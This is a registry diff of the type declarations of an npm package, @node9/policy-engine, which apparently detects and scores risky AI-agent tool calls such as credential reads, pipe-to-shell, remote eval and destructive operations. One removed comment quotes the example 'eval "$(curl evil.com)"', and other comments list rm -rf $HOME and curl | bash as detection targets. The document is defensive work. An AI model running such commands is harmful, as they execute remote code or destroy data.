@node9/policy-engine 1.0.0 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/dist/index.d.ts CHANGED
@@ -133,20 +133,6 @@ declare function redactText(text: string): {
133
133
  found: string[];
134
134
  };
135
135
 
136
- /**
137
- * Normalizes a bash command string for policy rule matching by replacing
138
- * pure-literal quoted strings that follow known message flags (e.g. -m, --body)
139
- * with empty double-quotes. This prevents text inside commit messages and PR
140
- * descriptions from triggering shell security rules.
141
- *
142
- * Unlike a regex-based approach, this uses the AST so it handles all quoting
143
- * styles correctly and won't over-strip. Execution flags like -c and -e
144
- * (psql, node, python) are intentionally left alone so their SQL/code
145
- * content continues to be evaluated by smart rules.
146
- *
147
- * Dynamic content (CmdSubst, ParamExp) inside double-quotes is never stripped
148
- * so patterns like `eval "$(curl evil.com)"` are always preserved.
149
- */
150
136
  declare function normalizeCommandForPolicy(command: string): string;
151
137
  /**
152
138
  * AST-based detection of dangerous shell execution patterns.
@@ -164,6 +150,22 @@ declare function normalizeCommandForPolicy(command: string): string;
164
150
  declare function detectDangerousShellExec(command: string): 'block' | 'review' | null;
165
151
  /** @deprecated Use detectDangerousShellExec — kept for backwards compatibility */
166
152
  declare const detectDangerousEval: typeof detectDangerousShellExec;
153
+ interface FsOpVerdict {
154
+ ruleName: string;
155
+ verdict: 'block' | 'review';
156
+ reason: string;
157
+ /** The actual path argument from the user's command — for explainability. */
158
+ path: string;
159
+ }
160
+ declare const BASH_TOOL_NAMES: Set<string>;
161
+ declare function isBashTool(toolName: string): boolean;
162
+ declare const AST_FS_REGEX_RULES: Set<string>;
163
+ /**
164
+ * True when `rawPath` is under $HOME (~ or absolute /home/* or /root) AND not in
165
+ * the tool-managed cache allow-list. Used to gate `rm -rf` on home paths.
166
+ */
167
+ declare function isProtectedHomePath(rawPath: string): boolean;
168
+ declare function analyzeFsOperation(command: string): FsOpVerdict | null;
167
169
  interface ShellCommandAnalysis {
168
170
  /** First word of every CallExpr — the command names invoked. */
169
171
  actions: string[];
@@ -313,7 +315,8 @@ declare function isIgnoredTool(toolName: string, config: PolicyConfig): boolean;
313
315
  declare function matchesPattern(text: string, patterns: string[] | string): boolean;
314
316
  /**
315
317
  * Reads `obj.a.b.c` style nested keys. Returns null when any segment is
316
- * missing or the parent isn't an object.
318
+ * missing, the parent isn't an object, or the path attempts to walk the
319
+ * prototype chain (`__proto__`, `constructor`, `prototype`).
317
320
  */
318
321
  declare function getNestedValue(obj: unknown, path: string): unknown;
319
322
  /**
@@ -409,7 +412,537 @@ interface LoopWindowEvaluation {
409
412
  */
410
413
  declare function evaluateLoopWindow(records: ToolCallRecord[], tool: string, args: unknown, threshold: number, windowMs: number, now: number): LoopWindowEvaluation;
411
414
 
415
+ /**
416
+ * One finding extracted from a JSONL delta scan. The host produces these
417
+ * per-line; the engine aggregates them into a summary. `lineIndex` is local
418
+ * to the JSONL file and not exfiltrated outside this struct — only the
419
+ * count of findings matters at the workspace level.
420
+ */
421
+ interface ScanFinding {
422
+ /** sessionId from the Claude Code JSONL line, used to bucket findings. */
423
+ sessionId: string;
424
+ /**
425
+ * What kind of finding. New extractors should add their own type here
426
+ * rather than overloading existing ones.
427
+ */
428
+ type: 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'network-exfil' | 'pipe-to-shell' | 'eval-of-remote' | 'destructive-op' | 'loop' | 'long-output-redacted';
429
+ /** DLP / PII pattern that matched, e.g. "GitHub Token" or "Email". */
430
+ patternName?: string;
431
+ /** Local line index within the source JSONL — never exfiltrated. */
432
+ lineIndex: number;
433
+ }
434
+ /**
435
+ * Per-signal counts. Adding a new signal extractor means adding a new key
436
+ * here; the FE will render it from this dict without code changes once
437
+ * the chart is wired up.
438
+ */
439
+ interface ScanSignals {
440
+ dlpFindings: number;
441
+ piiFindings: number;
442
+ sensitiveFileReads: number;
443
+ privilegeEscalation: number;
444
+ networkExfil: number;
445
+ pipeToShell: number;
446
+ evalOfRemote: number;
447
+ destructiveOps: number;
448
+ loops: number;
449
+ longOutputRedactions: number;
450
+ }
451
+ /**
452
+ * Compact, network-safe summary of a scan delta. This is the shape the
453
+ * proxy sends to the SaaS on every policy-sync tick. The SaaS persists it
454
+ * per-machine (1:1 with apiKey) and aggregates across the workspace for
455
+ * the dashboard's Recent Exposure card.
456
+ *
457
+ * `score` follows the same 0-100 scale as blast: higher is cleaner. We
458
+ * deduct per finding type based on severity weights (see `computeScanScore`
459
+ * below), capped so a noisy session doesn't bottom out the score on its own.
460
+ */
461
+ interface ScanSummary {
462
+ /** Number of distinct sessionIds touched by this scan delta. */
463
+ totalSessions: number;
464
+ /** Total tool-call lines parsed across all deltas. */
465
+ totalToolCalls: number;
466
+ /** Per-signal counts. */
467
+ signals: ScanSignals;
468
+ /**
469
+ * Top DLP/PII pattern names by count, descending. Truncated to topN to
470
+ * keep payload small. Only pattern *names*; samples never surface here.
471
+ */
472
+ topPatterns: Array<{
473
+ patternName: string;
474
+ count: number;
475
+ }>;
476
+ /** 0-100 cleanliness score. */
477
+ score: number;
478
+ }
479
+ /**
480
+ * Per-finding-type score deduction. Tuned so:
481
+ * - One credential leak (-30) drops the score from 100 to 70 — at-risk
482
+ * territory, demands attention.
483
+ * - One destructive op (-15) is a yellow flag.
484
+ * - One loop (-3) is mild noise; many loops still add up.
485
+ * Total deduction is capped at 100 so the score never goes negative.
486
+ *
487
+ * Exported so the SaaS Report can reuse the same severity ladder when
488
+ * blending scan signals into the workspace risk score (see
489
+ * `classifyScanSignal` in ../severity).
490
+ */
491
+ declare const SCAN_SIGNAL_WEIGHTS: Record<keyof ScanSignals, number>;
492
+ /**
493
+ * Compute the 0-100 cleanliness score. Public so other engine consumers
494
+ * can use the same weights without round-tripping through summarizeScan.
495
+ */
496
+ declare function computeScanScore(signals: ScanSignals): number;
497
+ declare const LOOP_THRESHOLD_FOR_WASTE = 3;
498
+ declare const COST_PER_LOOP_ITER_USD = 0.006;
499
+ /**
500
+ * Build the network-safe summary from a list of findings + total tool-call
501
+ * count. Deterministic: given the same input the output is identical
502
+ * (important for SaaS-side dedup and ETag-style caching of subsequent
503
+ * tick payloads).
504
+ *
505
+ * Top patterns are sorted by count desc, then alphabetically for stable
506
+ * ordering across calls. topN defaults to 10.
507
+ */
508
+ declare function summarizeScan(findings: ScanFinding[], opts?: {
509
+ totalToolCalls?: number;
510
+ topN?: number;
511
+ }): ScanSummary;
512
+
513
+ type Severity = 'critical' | 'high' | 'medium';
514
+ type ScoreTier = 'good' | 'at-risk' | 'critical';
515
+ /**
516
+ * Classify a rule by its name + verdict. Used by the proxy when scanning a
517
+ * Claude Code session — the rule that matched is known by name.
518
+ *
519
+ * Tiers:
520
+ * - critical: irreversible damage or credential exfiltration
521
+ * (rm -rf $HOME, eval-of-remote, AWS/SSH/GCP credential reads,
522
+ * repo deletion, helm uninstall, drop-table, drop-database, flushall,
523
+ * curl | bash, pipe-shell)
524
+ * - high: significant damage, recoverable
525
+ * (force push, git reset --hard, rebase, branch deletion, all other
526
+ * block-verdict rules)
527
+ * - medium: workflow / cost risk, not security
528
+ * (rm review, sudo review, redis config-set, dynamic eval, all other
529
+ * review-verdict rules)
530
+ */
531
+ declare function classifyRuleSeverity(name: string, verdict: 'block' | 'review' | 'allow'): Severity;
532
+ /**
533
+ * Map a rule slug to a friendly label suitable for narrative output.
534
+ *
535
+ * "block-read-aws" → "AWS credentials read"
536
+ * "shield:k8s:block-helm-uninstall" → "helm uninstall"
537
+ * "review-force-push" → "force pushes"
538
+ *
539
+ * Strips common prefixes (block-, review-, allow-, shield:..., org:) before
540
+ * matching, so cloud-tagged rules ("org:block-read-aws") map the same way.
541
+ */
542
+ declare function narrativeRuleLabel(name: string): string;
543
+ /**
544
+ * Audit-log entry for backend classification. Mirrors the relevant subset of
545
+ * AuditLog rows so backend code can pass them in without a Prisma dependency
546
+ * here.
547
+ */
548
+ interface AuditEntryForClassify {
549
+ checkedBy?: string | null;
550
+ toolName: string;
551
+ action: string;
552
+ riskMetadata?: {
553
+ ruleName?: string;
554
+ dlpPattern?: string;
555
+ [k: string]: unknown;
556
+ } | null;
557
+ }
558
+ /**
559
+ * Classify a single audit-log entry by what fired and which tool ran. Used by
560
+ * the SaaS /report endpoint to bucket audit events into severity tiers.
561
+ *
562
+ * Resolution order — first hit wins:
563
+ * 1. riskMetadata.ruleName → defer to classifyRuleSeverity (best signal)
564
+ * 2. checkedBy === 'dlp-block' or starts with 'dlp-saas:' → critical
565
+ * (any credential leak is critical regardless of which pattern matched)
566
+ * 3. checkedBy starts with 'eval-saas' or 'pipe-chain-saas:critical' → critical
567
+ * 4. checkedBy === 'loop-detected' → medium (cost / workflow, not security)
568
+ * 5. Block-status entries with no rule name → high (default for unattributed
569
+ * blocks; better than dropping the signal)
570
+ * 6. Otherwise → null (allowed actions don't have a severity)
571
+ */
572
+ declare function classifyAuditEntry(entry: AuditEntryForClassify): Severity | null;
573
+ /**
574
+ * Compute a 0-100 risk-posture score from severity counts + total events.
575
+ *
576
+ * Heuristic: each severity tier has a "cost" against a clean 100 score.
577
+ * Critical findings deduct the most, medium the least. Counts are normalised
578
+ * by total events so a workspace with 1 critical out of 10 events scores
579
+ * worse than one with 1 critical out of 10,000 — exposure rate matters more
580
+ * than absolute count.
581
+ *
582
+ * Tiers:
583
+ * - good : score ≥ 80
584
+ * - at-risk : 50 ≤ score < 80
585
+ * - critical : score < 50
586
+ *
587
+ * Empty workspaces (total === 0) score 100/good — no evidence of exposure
588
+ * is the only honest answer.
589
+ */
590
+ declare function computeSecurityScore(opts: {
591
+ critical: number;
592
+ high: number;
593
+ medium: number;
594
+ total: number;
595
+ }): {
596
+ score: number;
597
+ tier: ScoreTier;
598
+ };
599
+ /**
600
+ * Map a ScanSignals key to its severity tier. Uses the existing
601
+ * SCAN_SIGNAL_WEIGHTS so adding a new scan signal type only requires
602
+ * updating the weights table; classification follows automatically.
603
+ *
604
+ * Thresholds:
605
+ * - ≥ 25 → critical (dlpFindings, pipeToShell, evalOfRemote, networkExfil)
606
+ * - ≥ 11 → high (sensitiveFileReads, privilegeEscalation,
607
+ * destructiveOps)
608
+ * - else → medium (piiFindings, loops, longOutputRedactions)
609
+ */
610
+ declare function classifyScanSignal(key: keyof ScanSignals): Severity;
611
+ /**
612
+ * Compute a 0-100 risk-posture score that blends audit-log severity counts
613
+ * with forward-only scan signal counts.
614
+ *
615
+ * Why this exists: the live audit log answers "what did the firewall block
616
+ * in this window?" and the scan answers "what's sitting in past sessions?".
617
+ * Both are real risk; surfacing them as two separate scores forced users
618
+ * to reconcile two numbers. This function bins scan signals into the same
619
+ * critical/high/medium buckets via classifyScanSignal, sums them with the
620
+ * audit counts, and runs the existing computeSecurityScore math.
621
+ *
622
+ * Denominator handling: a workspace with zero audit traffic but non-zero
623
+ * scan findings would otherwise hit the `total === 0` short-circuit and
624
+ * return 100/good — a false-healthy reading. We add the scan contribution
625
+ * to `total` so the rate-based math runs:
626
+ *
627
+ * - If `scan.totalToolCalls` is provided, use it as the scan-side
628
+ * denominator (best signal — "1 finding per 10000 calls" should
629
+ * score better than "1 per 10").
630
+ * - Otherwise fall back to the count of scan findings, so a scan-only
631
+ * workspace with one credential leak resolves to 1/1 = 100% bad
632
+ * rate and lands in critical, not 0/0 = 100/good.
633
+ *
634
+ * Backwards compatible: calling with `audit` only and no `scan` produces
635
+ * the exact same result as `computeSecurityScore(audit)`.
636
+ */
637
+ declare function computeBlendedSecurityScore(opts: {
638
+ audit: {
639
+ critical: number;
640
+ high: number;
641
+ medium: number;
642
+ total: number;
643
+ };
644
+ scan?: {
645
+ signals: ScanSignals;
646
+ totalToolCalls?: number;
647
+ };
648
+ }): {
649
+ score: number;
650
+ tier: ScoreTier;
651
+ };
652
+
653
+ /**
654
+ * One sensitive path that the blast walker found readable on disk.
655
+ * `score` is the per-finding deduction this path contributes to the
656
+ * machine's overall blast-radius score (100 = clean).
657
+ */
658
+ interface BlastFinding {
659
+ /** Absolute path on disk. May be home-relative ("~/.aws/credentials"). */
660
+ full: string;
661
+ /** Display label — short form for UI ("~/.ssh/id_rsa", ".env (cwd)"). */
662
+ label: string;
663
+ /** One-line explanation of why this path matters. */
664
+ description: string;
665
+ /** Points deducted from the 100-point score when this path is reachable. */
666
+ score: number;
667
+ }
668
+ /** One environment variable the DLP scanner flagged as a credential. */
669
+ interface BlastEnvFinding {
670
+ /** Variable name, e.g. "AWS_SECRET_ACCESS_KEY". */
671
+ key: string;
672
+ /** DLP pattern that matched, e.g. "AWS Access Key". */
673
+ patternName: string;
674
+ }
675
+ /** Full result of a blast walk on one machine. */
676
+ interface BlastResult {
677
+ reachable: BlastFinding[];
678
+ envFindings: BlastEnvFinding[];
679
+ /** 0-100. Higher is better. */
680
+ score: number;
681
+ }
682
+ /**
683
+ * Compact, network-safe summary of a blast result. This is the shape the
684
+ * proxy sends to the SaaS and the SaaS persists per machine. We deliberately
685
+ * DO NOT send file contents, full paths, or sample values — only:
686
+ * - the score (already aggregate)
687
+ * - a count of how many things were exposed
688
+ * - the top-N worst paths' sanitised labels (truncated to 2 segments)
689
+ *
690
+ * The sanitisation step lives here in the engine so both the proxy (before
691
+ * send) and the SaaS (when validating) reference identical logic.
692
+ */
693
+ interface BlastSummary {
694
+ /** 0-100. Same as BlastResult.score. */
695
+ score: number;
696
+ /** reachable.length + envFindings.length — total exposure count. */
697
+ exposureCount: number;
698
+ /**
699
+ * Top-N worst findings (sorted by individual score deduction desc).
700
+ * Paths are truncated to the last 2 segments so we never exfiltrate
701
+ * project-layout details ("payments-prod/.env.production") — only the
702
+ * basename + parent ("payments-prod/.env.production" → ".env.production"
703
+ * if 1-segment, "payments-prod/.env.production" if 2-segment).
704
+ */
705
+ worstPaths: Array<{
706
+ path: string;
707
+ score: number;
708
+ }>;
709
+ /** Number of env vars flagged as credentials. No keys included. */
710
+ envExposureCount: number;
711
+ }
712
+ /**
713
+ * Sanitise a sensitive path for transmission. Keeps only the trailing 2
714
+ * segments — enough to identify the kind of file ("~/.aws/credentials"
715
+ * stays useful, "/Users/alice/Code/payments-prod/.env" becomes
716
+ * "payments-prod/.env" which doesn't reveal the home dir or directory tree).
717
+ *
718
+ * Edge cases:
719
+ * - Already short paths (≤2 segments) are returned as-is.
720
+ * - Paths with a leading "~" are kept as-is up to 2 segments.
721
+ * - Empty strings return "".
722
+ *
723
+ * Exported for unit tests + reuse anywhere a path needs the same treatment.
724
+ */
725
+ declare function truncateBlastPath(full: string): string;
726
+ /**
727
+ * Build the network-safe summary from a full BlastResult. Deterministic:
728
+ * given the same input the output is identical (important for caching /
729
+ * deduplication on the SaaS side). Top-N defaults to 5, configurable for
730
+ * tests.
731
+ */
732
+ declare function summarizeBlast(result: BlastResult, opts?: {
733
+ topN?: number;
734
+ }): BlastSummary;
735
+
736
+ /**
737
+ * Destructive-op regex. Word-boundary anchored so partial matches don't
738
+ * fire (e.g. the "rm" inside "terminate" doesn't match `\brm\b`). Each
739
+ * pattern is independently provable as destructive — no fuzzy heuristics.
740
+ */
741
+ declare const DESTRUCTIVE_OP_RE: RegExp;
742
+ /**
743
+ * Historical privilege-escalation regex. **No longer used by the canonical
744
+ * detector** — scan/canonical.ts moved sudo/su, chmod, and chown all to
745
+ * AST tokenization (analyzeShellCommand actions + allTokens) so:
746
+ * - Quoting bypasses (`s''udo`, `c\hmod`) don't slip past the matcher.
747
+ * - String literals like `echo "chmod 777 done"` or `cat /etc/sudoers`
748
+ * stop firing false positives — those don't put the action name in
749
+ * `actions`, only in `allTokens` (a Lit, not a CallExpr first-word).
750
+ *
751
+ * Kept as a public export for non-AST consumers that grep raw command
752
+ * strings (smart-rule conditions that match on the literal command text)
753
+ * and as documentation of the historical pattern set. Removing it would
754
+ * be a breaking change for downstream package consumers.
755
+ */
756
+ declare const PRIVILEGE_ESCALATION_RE: RegExp;
757
+ /**
758
+ * Sensitive file paths the agent shouldn't be reading via tool calls.
759
+ * Mirrors the blast walker's path set — same files matter, here detected
760
+ * at tool-call-time rather than fs-walk-time.
761
+ *
762
+ * `\b` boundaries on names so substring noise doesn't trigger; the
763
+ * patterns assume the proxy normalises ~ in inputs (which it does
764
+ * via path expansion before we see them).
765
+ */
766
+ declare const SENSITIVE_PATH_RE: RegExp;
767
+ /**
768
+ * Tool names that read or grep file contents. Used to gate SENSITIVE_PATH_RE
769
+ * to file-reading tools so the same path appearing in a Bash command doesn't
770
+ * double-count against a Read of the same file.
771
+ */
772
+ declare const FILE_TOOLS: Set<string>;
773
+
774
+ type PiiPattern = 'Email' | 'SSN' | 'Phone' | 'Credit Card';
775
+ /**
776
+ * Detect PII patterns in a string. Returns a deduplicated list — one entry
777
+ * per distinct pattern type, never multiple "Email" findings from one input.
778
+ */
779
+ declare function detectPii(text: string): PiiPattern[];
780
+
781
+ type CanonicalFindingType = 'smart-rule' | 'ast-fs-op' | 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'destructive-op' | 'pipe-to-shell' | 'eval-of-remote' | 'loop' | 'long-output-redacted';
782
+ type CanonicalAgent = 'claude' | 'gemini' | 'codex' | 'shell';
783
+ type CanonicalSourceType = 'default' | 'shield' | 'user' | 'engine';
784
+ interface CanonicalFinding {
785
+ /** Discriminator. Maps 1:1 to ScanFinding.type for the SaaS upload. */
786
+ type: CanonicalFindingType;
787
+ /**
788
+ * Stable rule identifier. For type='smart-rule' / 'ast-fs-op' it's the
789
+ * rule name (e.g. 'block-rm-rf-home', 'shield:project-jail:block-read-ssh').
790
+ * For built-in detector findings (PII, DLP, regex), a synthetic name keyed
791
+ * on the detector + pattern (e.g. 'pii:email', 'dlp:GitHub Token').
792
+ */
793
+ ruleName: string;
794
+ /** Block or review. Findings only exist for fired rules — no allow/info. */
795
+ verdict: 'block' | 'review';
796
+ /** Severity tier. Single source of truth — produced once at the engine. */
797
+ severity: Severity;
798
+ /** Engine-generated reason. Never carries user PII or raw secrets. */
799
+ reason: string;
800
+ /** Pattern name for DLP/PII (e.g. 'GitHub Token', 'Email'). */
801
+ patternName?: string;
802
+ /** Tool that produced the call. */
803
+ toolName: string;
804
+ agent: CanonicalAgent;
805
+ sessionId: string;
806
+ /** Project label or working directory the session lives in. */
807
+ project: string;
808
+ /** Local JSONL line offset. Never exfiltrated; used for dedupe. */
809
+ lineIndex: number;
810
+ /** Where the rule came from. 'engine' for built-in detectors. */
811
+ sourceType: CanonicalSourceType;
812
+ /** Optional shield/source label for UI. */
813
+ shieldLabel?: string;
814
+ /** When this exact (post-dedupe) finding was first / last seen. */
815
+ firstSeenAt: string;
816
+ lastSeenAt: string;
817
+ /** Post-dedupe match count. 1 by default, N for N collapsed raw matches. */
818
+ occurrenceCount: number;
819
+ /** AST findings: the path that triggered the verdict. */
820
+ subjectPath?: string;
821
+ /** Loop findings: dollar cost so far. Loop-only today; optional everywhere. */
822
+ costUsd?: number;
823
+ /** Loop findings: number of iterations. */
824
+ loopCount?: number;
825
+ loopKind?: 'loop' | 'long-iteration';
826
+ /** Loop findings: a sanitized command preview for UI. */
827
+ commandPreview?: string;
828
+ /** Raw tool input. Local CLI render only. */
829
+ input?: Record<string, unknown>;
830
+ /** DLP UI: first/last chars of the matched value with the middle replaced. */
831
+ redactedSample?: string;
832
+ }
833
+ /**
834
+ * Normalized per-call entry the per-line extractor consumes. Hosts (CLI
835
+ * scan, daemon, backfill) parse agent-specific JSONL into this shape so
836
+ * extractCanonicalFindings doesn't have to know about Claude vs Gemini vs
837
+ * Codex line layouts.
838
+ */
839
+ interface ToolCallEntry {
840
+ toolName: string;
841
+ args: Record<string, unknown>;
842
+ timestamp: string;
843
+ /** Bytes of tool result content for long-output detection. 0 / undefined
844
+ * for non-result entries. */
845
+ outputBytes?: number;
846
+ }
847
+ interface ExtractContext {
848
+ sessionId: string;
849
+ lineIndex: number;
850
+ project: string;
851
+ agent: CanonicalAgent;
852
+ rules: ReadonlyArray<{
853
+ rule: SmartRule;
854
+ sourceType: CanonicalSourceType;
855
+ shieldLabel?: string;
856
+ }>;
857
+ /** toolInspection map from PolicyConfig — drives shell-command extraction
858
+ * for tools that aren't the standard 'bash' name. Defaults handled by caller. */
859
+ toolInspection: Record<string, string>;
860
+ /** DLP enabled flag from PolicyConfig. */
861
+ dlpEnabled: boolean;
862
+ }
863
+ interface SessionExtractContext {
864
+ sessionId: string;
865
+ project: string;
866
+ agent: CanonicalAgent;
867
+ /**
868
+ * Loop-detection window settings. Mirrors PolicyConfig.policy.loopDetection.
869
+ *
870
+ * `windowSeconds: 0` means "no window" — count all matching calls in the
871
+ * session regardless of timing. This is the right setting for historical
872
+ * backfill (--upload-history): an agent that hammered the same Edit on
873
+ * the same file 126 times across hours is the loop pattern users care
874
+ * about, but a 120s window would never fire on it. The live hook keeps
875
+ * the small window because it's racing against an actively running agent.
876
+ */
877
+ loopDetection: {
878
+ enabled: boolean;
879
+ threshold: number;
880
+ windowSeconds: number;
881
+ };
882
+ }
883
+ interface SessionToolCall extends ToolCallEntry {
884
+ /** Local JSONL line where this call lived — propagates to the loop finding. */
885
+ lineIndex: number;
886
+ }
887
+ declare const LONG_OUTPUT_THRESHOLD_BYTES: number;
888
+ /**
889
+ * Wire-format identity of the canonical detector pipeline. Bumped when
890
+ * extractCanonicalFindings (and friends) change their output in a way
891
+ * that would invalidate verdicts already recorded against the previous
892
+ * version. The daemon stores this in ~/.node9/scan-watermark.json and
893
+ * triggers a one-time re-scan when its persisted value falls behind.
894
+ *
895
+ * Bump it when:
896
+ * - adding/removing a CanonicalFindingType
897
+ * - changing severity classification for an existing type
898
+ * - changing dedupe keys (would silently re-bucket existing findings)
899
+ * - any semantic change to the detectors that affects emitted counts
900
+ *
901
+ * Don't bump for:
902
+ * - comment-only edits
903
+ * - jsdoc tweaks
904
+ * - refactors that demonstrably preserve output
905
+ *
906
+ * scripts/check-extractor-version.mjs hashes the detector source files
907
+ * and fails CI when the hash drifts without a version bump — forgetting
908
+ * is loud, not silent.
909
+ */
910
+ declare const CANONICAL_EXTRACTOR_VERSION = "canonical-v4";
911
+ /**
912
+ * SHA-256 prefix of the detector-source files
913
+ * (canonical.ts + pii.ts + destructive-regex.ts).
914
+ *
915
+ * Updated by `npm run bump-extractor-version`. The CI gate in
916
+ * `.github/workflows/ci.yml` recomputes the hash on every push and fails
917
+ * if it doesn't match this constant — the contract is "if any of those
918
+ * files changed, this hash must change too, and you must consciously
919
+ * decide whether to bump CANONICAL_EXTRACTOR_VERSION."
920
+ */
921
+ declare const CANONICAL_EXTRACTOR_HASH = "64a6a63a27f4646f";
922
+ declare function extractCanonicalFindings(call: ToolCallEntry, ctx: ExtractContext): CanonicalFinding[];
923
+ declare function extractSessionLevelFindings(calls: ReadonlyArray<SessionToolCall>, ctx: SessionExtractContext): CanonicalFinding[];
924
+ /**
925
+ * Collapse equivalent findings into one row, summing occurrenceCount and
926
+ * spreading firstSeenAt / lastSeenAt across the matches. Dedupe key is
927
+ * (type, ruleName, command-preview, project, agent) — same shape scan.ts
928
+ * uses today (line 502), with `agent` added so cross-agent matches stay
929
+ * separated for the dashboard's per-agent breakdown.
930
+ */
931
+ declare function dedupeCanonicalFindings(findings: ReadonlyArray<CanonicalFinding>): CanonicalFinding[];
932
+ /**
933
+ * Project a CanonicalFinding into the privacy-safe ScanFinding shape the
934
+ * proxy sends to the SaaS. Drops `input`, `redactedSample`, `commandPreview`,
935
+ * `subjectPath` — anything that could carry user content. Counts and pattern
936
+ * names only, matching the privacy invariant in scan/index.ts.
937
+ *
938
+ * Returns null if the type doesn't have a corresponding ScanFinding bucket
939
+ * (currently `smart-rule` and `ast-fs-op` — those carry a user-defined or
940
+ * shield rule name and aren't part of the count-based summary).
941
+ */
942
+ declare function toScanFinding(c: CanonicalFinding): ScanFinding | null;
943
+ declare function previewArgs(input: Record<string, unknown>, max: number): string;
944
+
412
945
  /** Engine version stamped on audit entries for future drift detection. */
413
- declare const ENGINE_VERSION = "1.0.0";
946
+ declare const ENGINE_VERSION = "1.4.0";
414
947
 
415
- export { BUILTIN_SHIELDS, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, FLAGS_WITH_VALUES, LOOP_MAX_RECORDS, type LoopWindowEvaluation, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SENSITIVE_PATH_REGEXES, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallRecord, analyzePipeChain, analyzeShellCommand, checkDangerousSql, computeArgsHash, detectDangerousEval, detectDangerousShellExec, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractNetworkTargets, extractPositionalArgs, getCompiledRegex, getNestedValue, isIgnoredTool, isShieldVerdict, matchSensitivePath, matchesPattern, normalizeCommandForPolicy, parseAllSshHostsFromCommand, redactText, scanArgs, scanText, sensitivePathMatch, validateOverrides, validateRegex, validateShieldDefinition };
948
+ export { AST_FS_REGEX_RULES, type AuditEntryForClassify, BASH_TOOL_NAMES, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, CANONICAL_EXTRACTOR_HASH, CANONICAL_EXTRACTOR_VERSION, COST_PER_LOOP_ITER_USD, type CanonicalAgent, type CanonicalFinding, type CanonicalFindingType, type CanonicalSourceType, DESTRUCTIVE_OP_RE, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, type ExtractContext, FILE_TOOLS, FLAGS_WITH_VALUES, type FsOpVerdict, LONG_OUTPUT_THRESHOLD_BYTES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, PRIVILEGE_ESCALATION_RE, type PiiPattern, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_RE, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type SessionExtractContext, type SessionToolCall, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallEntry, type ToolCallRecord, analyzeFsOperation, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, dedupeCanonicalFindings, detectDangerousEval, detectDangerousShellExec, detectPii, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractCanonicalFindings, extractNetworkTargets, extractPositionalArgs, extractSessionLevelFindings, getCompiledRegex, getNestedValue, isBashTool, isIgnoredTool, isProtectedHomePath, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, previewArgs, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, toScanFinding, truncateBlastPath, 
validateOverrides, validateRegex, validateShieldDefinition };